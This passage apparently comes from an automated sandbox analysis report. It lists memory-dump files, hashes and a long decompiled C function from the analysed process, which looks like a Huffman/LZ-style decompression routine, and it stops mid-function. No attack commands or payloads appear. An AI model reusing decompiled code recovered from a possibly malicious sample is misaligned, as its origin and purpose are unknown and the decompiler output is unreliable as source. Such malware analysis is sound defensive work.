                            0x00000000
                            0x00000000
                            0x009f5939
                            0x009f593b
                            0x009f5940
                            0x009f5946
                            0x009f594c
                            0x00000000
                            0x00000000
                            0x009f5952
                            0x009f5952
                            0x009f5966
                            0x009f5966
                            0x009f596d
                            0x009f6261
                            0x009f6261
                            0x00000000
                            0x009f6261
                            0x00000000
                            0x009f596d
                            0x009f5954
                            0x009f5954
                            0x009f595a
                            0x009f5960
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f5960
                            0x009f58a1

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
                            • Instruction ID: b8d78e29f6114c4189335dbb170e56dcd18fcd418e672f43ea6d1e47a989d4cb
                            • Opcode Fuzzy Hash: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
                            • Instruction Fuzzy Hash: 7B62F871604B8D9FCB29CF28C8906B9BBE1AF95304F05895DDAEB8B346D734E945CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F6CDB, Relevance: .8, Instructions: 773COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 98%
                            			E009F6CDB(void* __ecx) {
				intOrPtr* _t347;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				void* _t365;
				intOrPtr _t370;
				signed int _t380;
				char _t389;
				unsigned int _t390;
				signed int _t397;
				void* _t399;
				intOrPtr _t404;
				signed int _t407;
				char _t416;
				signed int _t417;
				char _t418;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed short _t427;
				signed int _t430;
				void* _t435;
				intOrPtr _t440;
				signed int _t443;
				char _t452;
				unsigned int _t453;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t461;
				signed int _t462;
				signed short _t463;
				unsigned int _t467;
				unsigned int _t472;
				intOrPtr _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				unsigned int _t496;
				unsigned int _t498;
				intOrPtr _t499;
				signed int _t501;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				unsigned int _t510;
				void* _t512;
				signed int _t515;
				signed int* _t518;
				unsigned int _t521;
				void* _t523;
				signed int _t526;
				signed int _t529;
				intOrPtr _t530;
				void* _t532;
				signed int _t535;
				signed int _t536;
				intOrPtr* _t538;
				void* _t539;
				signed int _t542;
				intOrPtr _t545;
				unsigned int _t552;
				void* _t554;
				signed int _t557;
				signed int _t559;
				signed int _t561;
				intOrPtr _t563;
				void* _t565;
				signed int _t568;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				void* _t575;
				signed int _t578;
				intOrPtr* _t580;
				void* _t581;
				signed int _t584;
				void* _t587;
				signed int _t590;
				intOrPtr* _t593;
				void* _t594;
				signed int _t597;
				void* _t600;
				signed int _t603;
				intOrPtr* _t607;
				void* _t608;
				signed int _t611;
				signed int _t614;
				unsigned int _t616;
				signed int _t619;
				signed int _t620;
				unsigned int _t622;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				intOrPtr* _t645;
				unsigned int _t647;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				intOrPtr _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				void* _t663;
				intOrPtr _t666;
				intOrPtr* _t667;
				intOrPtr* _t668;
				signed int _t671;
				signed int _t673;
				intOrPtr* _t675;
				signed int _t677;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				void* _t691;

				_t654 =  *((intOrPtr*)(_t691 + 0x34));
				_t663 = __ecx;
				if( *((char*)(_t654 + 0x2c)) != 0) {
					L3:
					_t505 =  *((intOrPtr*)(_t654 + 0x18));
					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
						L2:
						 *((char*)(_t654 + 0x4ad0)) = 1;
						return 0;
					} else {
						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
						__eflags = _t666 - _t489;
						if(_t666 >= _t489) {
							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
						}
						_t347 = _t654 + 4;
						while(1) {
							_t614 =  *(_t663 + 0xe6dc);
							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
							_t506 =  *_t347;
							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
								goto L16;
							}
							L10:
							__eflags = _t506 - _t666;
							if(__eflags > 0) {
								L100:
								_t418 = 1;
								L101:
								return _t418;
							}
							if(__eflags != 0) {
								L13:
								__eflags = _t506 - _t499;
								if(_t506 < _t499) {
									L15:
									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
										L151:
										 *((char*)(_t654 + 0x4ad3)) = 1;
										goto L100;
									}
									goto L16;
								}
								__eflags =  *((char*)(_t654 + 0x4ad2));
								if( *((char*)(_t654 + 0x4ad2)) == 0) {
									goto L151;
								}
								goto L15;
							}
							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
								goto L100;
							}
							goto L13;
							L16:
							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
								L21:
								_t667 = _t654 + 4;
								_t351 = E009EA4ED(_t667);
								_t352 =  *(_t654 + 0xb4);
								_t616 = _t351 & 0x0000fffe;
								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
									_t490 = 0xf;
									_t353 = _t352 + 1;
									__eflags = _t353 - _t490;
									if(_t353 >= _t490) {
										L30:
										_t510 =  *(_t667 + 4) + _t490;
										 *(_t667 + 4) = _t510 & 0x00000007;
										_t355 = _t510 >> 3;
										 *_t667 =  *_t667 + _t355;
										_t512 = 0x10;
										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
										asm("sbb eax, eax");
										_t356 = _t355 & _t515;
										__eflags = _t356;
										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
										_t347 = _t654 + 4;
										L31:
										__eflags = _t619 - 0x100;
										if(_t619 >= 0x100) {
											__eflags = _t619 - 0x106;
											if(_t619 < 0x106) {
												__eflags = _t619 - 0x100;
												if(_t619 != 0x100) {
													__eflags = _t619 - 0x101;
													if(_t619 != 0x101) {
														_t620 = _t619 + 0xfffffefe;
														__eflags = _t620;
														_t518 =  &((_t663 + 0x60)[_t620]);
														_t491 =  *_t518;
														 *(_t691 + 0x24) = _t491;
														if(_t620 == 0) {
															L122:
															_t668 = _t654 + 4;
															 *(_t663 + 0x60) = _t491;
															_t357 = E009EA4ED(_t668);
															_t358 =  *(_t654 + 0x2d78);
															_t622 = _t357 & 0x0000fffe;
															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
																_t492 = 0xf;
																_t359 = _t358 + 1;
																__eflags = _t359 - _t492;
																if(_t359 >= _t492) {
																	L130:
																	_t521 =  *(_t668 + 4) + _t492;
																	 *(_t668 + 4) = _t521 & 0x00000007;
																	_t361 = _t521 >> 3;
																	 *_t668 =  *_t668 + _t361;
																	_t523 = 0x10;
																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t362 = _t361 & _t526;
																	__eflags = _t362;
																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
																	L131:
																	_t493 = _t363 & 0x0000ffff;
																	__eflags = _t493 - 8;
																	if(_t493 >= 8) {
																		_t671 = (_t493 >> 2) - 1;
																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
																		__eflags = _t493;
																	} else {
																		_t671 = 0;
																	}
																	_t496 = _t493 + 2;
																	__eflags = _t671;
																	if(_t671 != 0) {
																		_t390 = E009EA4ED(_t654 + 4);
																		_t532 = 0x10;
																		_t496 = _t496 + (_t390 >> _t532 - _t671);
																		_t535 =  *(_t654 + 8) + _t671;
																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
																		_t536 = _t535 & 0x00000007;
																		__eflags = _t536;
																		 *(_t654 + 8) = _t536;
																	}
																	_t625 =  *(_t663 + 0x7c);
																	_t673 = _t625 -  *(_t691 + 0x24);
																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
																	 *(_t663 + 0x74) = _t496;
																	__eflags = _t673 - _t365;
																	if(_t673 >= _t365) {
																		L147:
																		_t347 = _t654 + 4;
																		__eflags = _t496;
																		if(_t496 == 0) {
																			goto L7;
																		}
																		_t655 =  *(_t663 + 0xe6dc);
																		do {
																			_t656 = _t655 & _t673;
																			_t673 = _t673 + 1;
																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
																			_t655 =  *(_t663 + 0xe6dc);
																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
																			_t496 = _t496 - 1;
																			__eflags = _t496;
																		} while (_t496 != 0);
																		L150:
																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																		L33:
																		_t347 = _t654 + 4;
																		goto L7;
																	} else {
																		__eflags = _t625 - _t365;
																		if(_t625 >= _t365) {
																			goto L147;
																		}
																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
																		_t675 = _t673 + _t370;
																		_t529 = _t370 + _t625;
																		 *(_t691 + 0x1c) = _t529;
																		 *(_t663 + 0x7c) = _t625 + _t496;
																		__eflags =  *(_t691 + 0x24) - _t496;
																		if( *(_t691 + 0x24) >= _t496) {
																			__eflags = _t496 - 8;
																			if(_t496 < 8) {
																				L85:
																				_t347 = _t654 + 4;
																				__eflags = _t498;
																				if(_t498 == 0) {
																					L7:
																					L8:
																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
																					while(1) {
																						_t614 =  *(_t663 + 0xe6dc);
																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
																						_t506 =  *_t347;
																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
																							goto L16;
																						}
																						goto L10;
																					}
																				}
																				 *_t529 =  *_t675;
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 1;
																				if(_t498 <= 1) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 2;
																				if(_t498 <= 2) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 3;
																				if(_t498 <= 3) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 4;
																				if(_t498 <= 4) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 5;
																				if(_t498 <= 5) {
																					goto L7;
																				}
																				__eflags = _t498 - 6;
																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																				_t347 = _t654 + 4;
																				if(_t498 > 6) {
																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																					_t347 = _t654 + 4;
																				}
																				goto L8;
																			}
																			_t380 = _t496 >> 3;
																			__eflags = _t380;
																			 *(_t691 + 0x24) = _t380;
																			_t657 = _t380;
																			do {
																				E009FEA80(_t529, _t675, 8);
																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
																				_t691 = _t691 + 0xc;
																				_t529 = _t530 + 8;
																				_t675 = _t675 + 8;
																				_t496 = _t496 - 8;
																				 *(_t691 + 0x1c) = _t529;
																				_t657 = _t657 - 1;
																				__eflags = _t657;
																			} while (_t657 != 0);
																			L84:
																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																			goto L85;
																		}
																		__eflags = _t496 - 8;
																		if(_t496 < 8) {
																			goto L85;
																		}
																		_t628 = _t496 >> 3;
																		__eflags = _t628;
																		do {
																			_t496 = _t496 - 8;
																			 *_t529 =  *_t675;
																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																			_t389 =  *((intOrPtr*)(_t675 + 7));
																			_t675 = _t675 + 8;
																			 *((char*)(_t529 + 7)) = _t389;
																			_t529 = _t529 + 8;
																			_t628 = _t628 - 1;
																			__eflags = _t628;
																		} while (_t628 != 0);
																		goto L85;
																	}
																}
																_t538 = _t654 + (_t359 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t622 -  *_t538;
																	if(_t622 <  *_t538) {
																		break;
																	}
																	_t359 = _t359 + 1;
																	_t538 = _t538 + 4;
																	__eflags = _t359 - 0xf;
																	if(_t359 < 0xf) {
																		continue;
																	}
																	goto L130;
																}
																_t492 = _t359;
																goto L130;
															}
															_t539 = 0x10;
															_t629 = _t622 >> _t539 - _t358;
															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
															 *_t668 =  *_t668 + (_t542 >> 3);
															 *(_t668 + 4) = _t542 & 0x00000007;
															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
															goto L131;
														} else {
															goto L121;
														}
														do {
															L121:
															 *_t518 =  *(_t518 - 4);
															_t518 = _t518 - 4;
															_t620 = _t620 - 1;
															__eflags = _t620;
														} while (_t620 != 0);
														goto L122;
													}
													_t498 =  *(_t663 + 0x74);
													_t666 =  *((intOrPtr*)(_t691 + 0x14));
													__eflags = _t498;
													if(_t498 == 0) {
														L23:
														_t499 =  *((intOrPtr*)(_t691 + 0x10));
														continue;
													}
													_t397 =  *(_t663 + 0x60);
													_t630 =  *(_t663 + 0x7c);
													_t677 = _t630 - _t397;
													 *(_t691 + 0x1c) = _t397;
													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													__eflags = _t677 - _t399;
													if(_t677 >= _t399) {
														L116:
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L7;
														}
														_t658 =  *(_t663 + 0xe6dc);
														do {
															_t659 = _t658 & _t677;
															_t677 = _t677 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
															_t658 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													}
													__eflags = _t630 - _t399;
													if(_t630 >= _t399) {
														goto L116;
													}
													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
													_t675 = _t677 + _t404;
													_t529 = _t404 + _t630;
													 *(_t691 + 0x24) = _t529;
													 *(_t663 + 0x7c) = _t630 + _t498;
													__eflags =  *(_t691 + 0x1c) - _t498;
													if( *(_t691 + 0x1c) >= _t498) {
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t407 = _t498 >> 3;
														__eflags = _t407;
														_t660 = _t407;
														do {
															E009FEA80(_t529, _t675, 8);
															_t545 =  *((intOrPtr*)(_t691 + 0x30));
															_t691 = _t691 + 0xc;
															_t529 = _t545 + 8;
															_t675 = _t675 + 8;
															_t498 = _t498 - 8;
															 *(_t691 + 0x24) = _t529;
															_t660 = _t660 - 1;
															__eflags = _t660;
														} while (_t660 != 0);
														goto L84;
													}
													__eflags = _t498 - 8;
													if(_t498 < 8) {
														goto L85;
													}
													_t633 = _t498 >> 3;
													__eflags = _t633;
													do {
														_t498 = _t498 - 8;
														 *_t529 =  *_t675;
														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
														_t416 =  *((intOrPtr*)(_t675 + 7));
														_t675 = _t675 + 8;
														 *((char*)(_t529 + 7)) = _t416;
														_t529 = _t529 + 8;
														_t633 = _t633 - 1;
														__eflags = _t633;
													} while (_t633 != 0);
													goto L85;
												}
												_push(_t691 + 0x28);
												_t417 = E009F3564(_t663, _t347);
												__eflags = _t417;
												if(_t417 == 0) {
													goto L100;
												}
												_t420 = E009F1A0E(_t663, _t691 + 0x28);
												__eflags = _t420;
												if(_t420 != 0) {
													goto L33;
												}
												goto L100;
											}
											_t501 = _t619 - 0x106;
											__eflags = _t501 - 8;
											if(_t501 >= 8) {
												_t680 = (_t501 >> 2) - 1;
												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
												__eflags = _t501;
											} else {
												_t680 = 0;
											}
											_t498 = _t501 + 2;
											__eflags = _t680;
											if(_t680 == 0) {
												_t681 = _t654 + 4;
											} else {
												_t472 = E009EA4ED(_t347);
												_t600 = 0x10;
												_t498 = _t498 + (_t472 >> _t600 - _t680);
												_t603 =  *(_t654 + 8) + _t680;
												_t681 = _t654 + 4;
												 *_t681 =  *_t681 + (_t603 >> 3);
												 *(_t681 + 4) = _t603 & 0x00000007;
											}
											_t421 = E009EA4ED(_t681);
											_t422 =  *(_t654 + 0xfa0);
											_t635 = _t421 & 0x0000fffe;
											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
												_t682 = 0xf;
												_t423 = _t422 + 1;
												__eflags = _t423 - _t682;
												if(_t423 >= _t682) {
													L49:
													_t552 =  *(_t654 + 8) + _t682;
													 *(_t654 + 8) = _t552 & 0x00000007;
													_t425 = _t552 >> 3;
													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
													_t554 = 0x10;
													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
													asm("sbb eax, eax");
													_t426 = _t425 & _t557;
													__eflags = _t426;
													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
													goto L50;
												}
												_t593 = _t654 + (_t423 + 0x3c8) * 4;
												while(1) {
													__eflags = _t635 -  *_t593;
													if(_t635 <  *_t593) {
														break;
													}
													_t423 = _t423 + 1;
													_t593 = _t593 + 4;
													__eflags = _t423 - 0xf;
													if(_t423 < 0xf) {
														continue;
													}
													goto L49;
												}
												_t682 = _t423;
												goto L49;
											} else {
												_t594 = 0x10;
												_t652 = _t635 >> _t594 - _t422;
												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
												 *_t681 =  *_t681 + (_t597 >> 3);
												 *(_t681 + 4) = _t597 & 0x00000007;
												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
												L50:
												_t638 = _t427 & 0x0000ffff;
												__eflags = _t638 - 4;
												if(_t638 >= 4) {
													_t430 = (_t638 >> 1) - 1;
													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
													__eflags = _t638;
												} else {
													_t430 = 0;
												}
												 *(_t691 + 0x18) = _t430;
												_t559 = _t638 + 1;
												 *(_t691 + 0x24) = _t559;
												_t683 = _t559;
												 *(_t691 + 0x1c) = _t683;
												__eflags = _t430;
												if(_t430 == 0) {
													L70:
													__eflags = _t683 - 0x100;
													if(_t683 > 0x100) {
														_t498 = _t498 + 1;
														__eflags = _t683 - 0x2000;
														if(_t683 > 0x2000) {
															_t498 = _t498 + 1;
															__eflags = _t683 - 0x40000;
															if(_t683 > 0x40000) {
																_t498 = _t498 + 1;
																__eflags = _t498;
															}
														}
													}
													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
													 *(_t663 + 0x68) =  *(_t663 + 0x64);
													 *(_t663 + 0x64) =  *(_t663 + 0x60);
													 *(_t663 + 0x60) = _t683;
													_t641 =  *(_t663 + 0x7c);
													_t561 = _t641 - _t683;
													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													 *(_t663 + 0x74) = _t498;
													 *(_t691 + 0x24) = _t561;
													__eflags = _t561 - _t435;
													if(_t561 >= _t435) {
														L93:
														_t666 =  *((intOrPtr*)(_t691 + 0x14));
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L23;
														}
														_t684 =  *(_t663 + 0xe6dc);
														_t661 =  *(_t691 + 0x24);
														do {
															_t685 = _t684 & _t661;
															_t661 = _t661 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
															_t684 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													} else {
														__eflags = _t641 - _t435;
														if(_t641 >= _t435) {
															goto L93;
														}
														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
														_t675 = _t440 + _t561;
														_t529 = _t440 + _t641;
														 *(_t691 + 0x24) = _t529;
														 *(_t663 + 0x7c) = _t641 + _t498;
														__eflags =  *(_t691 + 0x1c) - _t498;
														if( *(_t691 + 0x1c) >= _t498) {
															__eflags = _t498 - 8;
															if(_t498 < 8) {
																goto L85;
															}
															_t443 = _t498 >> 3;
															__eflags = _t443;
															 *(_t691 + 0x1c) = _t443;
															_t662 = _t443;
															do {
																E009FEA80(_t529, _t675, 8);
																_t563 =  *((intOrPtr*)(_t691 + 0x30));
																_t691 = _t691 + 0xc;
																_t529 = _t563 + 8;
																_t675 = _t675 + 8;
																_t498 = _t498 - 8;
																 *(_t691 + 0x24) = _t529;
																_t662 = _t662 - 1;
																__eflags = _t662;
															} while (_t662 != 0);
															goto L84;
														}
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t644 = _t498 >> 3;
														__eflags = _t644;
														do {
															_t498 = _t498 - 8;
															 *_t529 =  *_t675;
															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
															_t452 =  *((intOrPtr*)(_t675 + 7));
															_t675 = _t675 + 8;
															 *((char*)(_t529 + 7)) = _t452;
															_t529 = _t529 + 8;
															_t644 = _t644 - 1;
															__eflags = _t644;
														} while (_t644 != 0);
														goto L85;
													}
												} else {
													__eflags = _t430 - 4;
													if(__eflags < 0) {
														_t453 = E009F7D76(_t654 + 4);
														_t565 = 0x20;
														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
														_t569 = _t568 & 0x00000007;
														__eflags = _t569;
														 *(_t654 + 8) = _t569;
														L69:
														 *(_t691 + 0x1c) = _t683;
														goto L70;
													}
													if(__eflags <= 0) {
														_t645 = _t654 + 4;
													} else {
														_t467 = E009F7D76(_t654 + 4);
														_t651 =  *(_t691 + 0x18);
														_t587 = 0x24;
														_t590 = _t651 - 4 +  *(_t654 + 8);
														_t645 = _t654 + 4;
														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
														 *_t645 =  *_t645 + (_t590 >> 3);
														 *(_t645 + 4) = _t590 & 0x00000007;
													}
													_t456 = E009EA4ED(_t645);
													_t457 =  *(_t654 + 0x1e8c);
													_t647 = _t456 & 0x0000fffe;
													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
														_t571 = 0xf;
														_t458 = _t457 + 1;
														 *(_t691 + 0x18) = _t571;
														__eflags = _t458 - _t571;
														if(_t458 >= _t571) {
															L66:
															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
															_t461 =  *(_t691 + 0x18);
															 *(_t654 + 8) = _t573 & 0x00000007;
															_t575 = 0x10;
															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
															asm("sbb eax, eax");
															_t462 = _t461 & _t578;
															__eflags = _t462;
															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
															goto L67;
														}
														_t580 = _t654 + (_t458 + 0x783) * 4;
														while(1) {
															__eflags = _t647 -  *_t580;
															if(_t647 <  *_t580) {
																break;
															}
															_t458 = _t458 + 1;
															_t580 = _t580 + 4;
															__eflags = _t458 - 0xf;
															if(_t458 < 0xf) {
																continue;
															}
															goto L66;
														}
														 *(_t691 + 0x18) = _t458;
														goto L66;
													} else {
														_t581 = 0x10;
														_t650 = _t647 >> _t581 - _t457;
														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
														 *(_t654 + 8) = _t584 & 0x00000007;
														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
														L67:
														_t683 = _t683 + (_t463 & 0x0000ffff);
														goto L69;
													}
												}
											}
										}
										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
										_t69 = _t663 + 0x7c;
										 *_t69 =  *(_t663 + 0x7c) + 1;
										__eflags =  *_t69;
										goto L33;
									}
									_t607 = _t654 + (_t353 + 0xd) * 4;
									while(1) {
										__eflags = _t616 -  *_t607;
										if(_t616 <  *_t607) {
											break;
										}
										_t353 = _t353 + 1;
										_t607 = _t607 + 4;
										__eflags = _t353 - 0xf;
										if(_t353 < 0xf) {
											continue;
										}
										goto L30;
									}
									_t490 = _t353;
									goto L30;
								}
								_t608 = 0x10;
